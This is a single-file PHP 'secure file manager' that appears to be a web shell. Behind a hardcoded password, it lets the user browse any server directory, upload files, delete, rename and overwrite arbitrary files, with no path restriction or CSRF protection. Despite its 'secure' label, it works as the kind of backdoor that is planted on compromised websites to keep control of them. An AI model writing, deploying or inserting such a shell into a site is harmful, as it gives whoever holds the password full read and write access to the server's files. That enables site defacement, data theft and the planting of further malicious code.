<?php
// Lightweight Secure File Manager - Minimized Version
session_start();

define('FM_PASS', 'aaaajjkjhjkhhdkkgdgggjgsjyygfgygfyweg@9384498177282##^');

// ====================== AUTH ======================
if (!isset($_SESSION['fm_auth'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pwd'])) {
        if ($_POST['pwd'] === FM_PASS) {
            $_SESSION['fm_auth'] = true;
        } else {
            $error = "Invalid password";
        }
    }
    if (!isset($_SESSION['fm_auth'])) {
        ?>
        <!DOCTYPE html>
        <html><head><title>Login</title><meta charset="UTF-8">
        <style>
            body{font-family:system-ui,sans-serif;background:#f5f5f5;display:flex;min-height:100vh;align-items:center;justify-content:center;margin:0}
            .card{background:#fff;padding:2rem;border-radius:12px;box-shadow:0 4px 12px rgba(0,0,0,0.1);width:320px}
            input,button{width:100%;padding:12px;margin:8px 0;border-radius:8px;border:1px solid #ddd}
            button{background:#2563eb;color:#fff;border:none;cursor:pointer;font-weight:600}
            button:hover{background:#1d4ed8}
            .error{color:#c00}
        </style>
        </head><body>
        <div class="card">
            <h2 style="margin:0 0 1rem 0">🔐 File Manager</h2>
            <?php if(isset($error)) echo "<p class='error'>$error</p>"; ?>
            <form method="post">
                <input type="password" name="pwd" placeholder="Password" autofocus required>
                <button type="submit">Login</button>
            </form>
        </div>
        </body></html><?php
        exit;
    }
}

if (isset($_GET['logout'])) { session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit; }

// ====================== CORE ======================
$dir = isset($_GET['dir']) && is_dir($_GET['dir']) ? rtrim($_GET['dir'], '/') : getcwd();
$msg = '';

// Upload
if (!empty($_FILES['up'])) {
    $target = $dir . '/' . basename($_FILES['up']['name']);
    $msg = move_uploaded_file($_FILES['up']['tmp_name'], $target) 
        ? "✅ Uploaded: " . htmlspecialchars(basename($target))
        : "❌ Upload failed";
}

// Delete
if (isset($_GET['del']) && is_file($_GET['del'])) {
    $msg = unlink($_GET['del']) 
        ? "🗑️ Deleted: " . basename($_GET['del'])
        : "❌ Delete failed";
}

// Rename
if (isset($_POST['rename_old'], $_POST['rename_new']) && file_exists($_POST['rename_old'])) {
    $msg = rename($_POST['rename_old'], $_POST['rename_new'])
        ? "✏️ Renamed → " . basename($_POST['rename_new'])
        : "❌ Rename failed";
}

// Save edited file
if (isset($_POST['save_path'], $_POST['content'])) {
    $msg = file_put_contents($_POST['save_path'], $_POST['content']) !== false
        ? "💾 Saved: " . basename($_POST['save_path'])
        : "❌ Save failed";
}
?>
<!DOCTYPE html>
<html><head><title>File Manager</title><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1">
<style>
    *{box-sizing:border-box}
    body{font-family:system-ui,sans-serif;margin:0;padding:15px;background:#f8fafc}
    .container{max-width:960px;margin:auto}
    .header{display:flex;justify-content:space-between;align-items:center;margin-bottom:15px}
    .card{background:#fff;border-radius:10px;box-shadow:0 1px 3px rgba(0,0,0,0.1);padding:15px;margin-bottom:15px}
    .dir{background:#f1f5f9;padding:10px;border-radius:8px;font-family:monospace;margin-bottom:12px;word-break:break-all}
    .btn{padding:8px 14px;border:none;border-radius:6px;cursor:pointer;background:#e2e8f0}
    .btn-primary{background:#2563eb;color:#fff}
    .file-row{display:flex;justify-content:space-between;align-items:center;padding:10px 0;border-bottom:1px solid #eee}
    .actions a{margin-left:12px;color:#2563eb;text-decoration:none}
    .msg{padding:10px;border-radius:8px;margin-bottom:15px;background:#dcfce7;color:#166534}
    textarea,input[type=text]{width:100%;font-family:monospace;padding:10px;border:1px solid #cbd5e1;border-radius:6px}
</style>
</head><body>
<div class="container">

<div class="header">
    <h2 style="margin:0">📁 File Manager</h2>
    <a href="?logout=1" style="color:#2563eb">Logout</a>
</div>

<?php if($msg) echo "<div class='msg'>$msg</div>"; ?>

<div class="card">
    <div class="dir">📂 <?=htmlspecialchars($dir)?></div>
    <a href="?dir=<?=urlencode(dirname($dir))?>" style="color:#2563eb">⬆️ Parent</a>

    <form method="post" enctype="multipart/form-data" style="margin-top:12px">
        <input type="file" name="up" required style="margin:8px 0">
        <input type="hidden" name="dir" value="<?=htmlspecialchars($dir)?>">
        <button type="submit" class="btn btn-primary">Upload</button>
    </form>
</div>

<div class="card">
    <h3 style="margin:0 0 12px 0">Files & Folders</h3>
    <?php
    foreach(scandir($dir) as $item) {
        if($item === '.' || $item === '..') continue;
        $path = $dir . '/' . $item;
        $isDir = is_dir($path);
        $size = $isDir ? 'folder' : round(@filesize($path)/1024,1).' KB';
        ?>
        <div class="file-row">
            <span><?= $isDir ? '📂' : '📄' ?> <?=htmlspecialchars($item)?> 
                 <small style="color:#64748b">(<?=$size?>)</small></span>
            <div class="actions">
                <?php if($isDir): ?>
                    <a href="?dir=<?=urlencode($path)?>">Open</a>
                <?php else: ?>
                    <a href="?edit=<?=urlencode($path)?>&dir=<?=urlencode($dir)?>">Edit</a>
                    <a href="?rename=<?=urlencode($path)?>&dir=<?=urlencode($dir)?>">Rename</a>
                    <a href="?del=<?=urlencode($path)?>&dir=<?=urlencode($dir)?>" onclick="return confirm('Delete <?=htmlspecialchars($item)?>?')">Delete</a>
                <?php endif; ?>
            </div>
        </div>
        <?php
    }
    ?>
</div>

<?php
// Edit File
if(isset($_GET['edit']) && is_file($_GET['edit'])) {
    $file = $_GET['edit'];
    $content = file_get_contents($file);
    ?>
    <div class="card">
        <h3>Editing: <?=htmlspecialchars(basename($file))?></h3>
        <form method="post">
            <input type="hidden" name="save_path" value="<?=htmlspecialchars($file)?>">
            <textarea name="content" rows="15"><?=htmlspecialchars($content)?></textarea>
            <div style="margin-top:10px">
                <button type="submit" class="btn btn-primary">💾 Save</button>
                <a href="?dir=<?=urlencode($dir)?>" class="btn">Cancel</a>
            </div>
        </form>
    </div>
    <?php
}

// Rename Form
if(isset($_GET['rename']) && file_exists($_GET['rename'])) {
    $old = $_GET['rename'];
    ?>
    <div class="card">
        <h3>Rename: <?=htmlspecialchars(basename($old))?></h3>
        <form method="post">
            <input type="hidden" name="rename_old" value="<?=htmlspecialchars($old)?>">
            <input type="text" name="rename_new" value="<?=htmlspecialchars($old)?>" required>
            <div style="margin-top:10px">
                <button type="submit" class="btn btn-primary">Rename</button>
                <a href="?dir=<?=urlencode($dir)?>" class="btn">Cancel</a>
            </div>
        </form>
    </div>
    <?php
}
?>
</div>
</body></html>